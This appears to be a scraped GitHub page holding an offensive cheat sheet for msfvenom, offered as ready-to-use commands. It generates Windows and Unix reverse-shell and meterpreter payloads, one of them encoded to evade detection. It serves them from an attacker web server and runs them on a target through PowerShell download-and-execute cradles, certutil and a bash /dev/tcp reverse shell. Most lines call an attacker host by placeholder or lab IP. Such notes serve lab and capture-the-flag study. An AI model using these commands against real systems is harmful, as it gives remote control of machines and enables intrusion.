1.5 KiB

Raw Blame History

msfvenom usage

msfvenom -p <payload> <options>

syntax <OS>/<arch>/<payload>
- stageless linux/x86/shell_reverse_tcp
- staged linux/x86/shell/reverse_tcp

Windows

x64 Reverse Shell in exe format

msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>

x86 shikata_ga_nai

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encode x86/shikata_ga_nai LHOST=10.9.7.123 LPORT=4446 -f exe -o shell.exe

Getting the shell on target

on attack machine, with shell.exe in cwd

python -m http.server

on target machine execute this

powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"

Start-Process "shell.exe"

powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

powershell -c "Invoke-WebRequest -Uri 'ip/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"

or on cmd.exe

certutil -urlcache -split -f http://<attacker-IP>:<attacker-Port>/shell.exe

Unix

netcat reverse

msfvenom -p cmd/unix/reverse_netcat LHOST=<listen-ip> LPORT=<liste-port> R

Alternatively, not msfvenom bash -c "bash -i >& /dev/tcp/<listen-ip>/<listen-port> 0>&1"

Include into Python Exploit as hex

msfvenom -p windows/shell_reverse_tcp LHOST=10.9.7.193 LPORT=4444 EXITFUNC=thread -b "\x00" -f py

1.5 KiB Raw Blame History

msfvenom usage

Windows

x64 Reverse Shell in exe format

x86 shikata_ga_nai

Getting the shell on target

Unix

netcat reverse

Include into Python Exploit as hex

1.5 KiB

Raw Blame History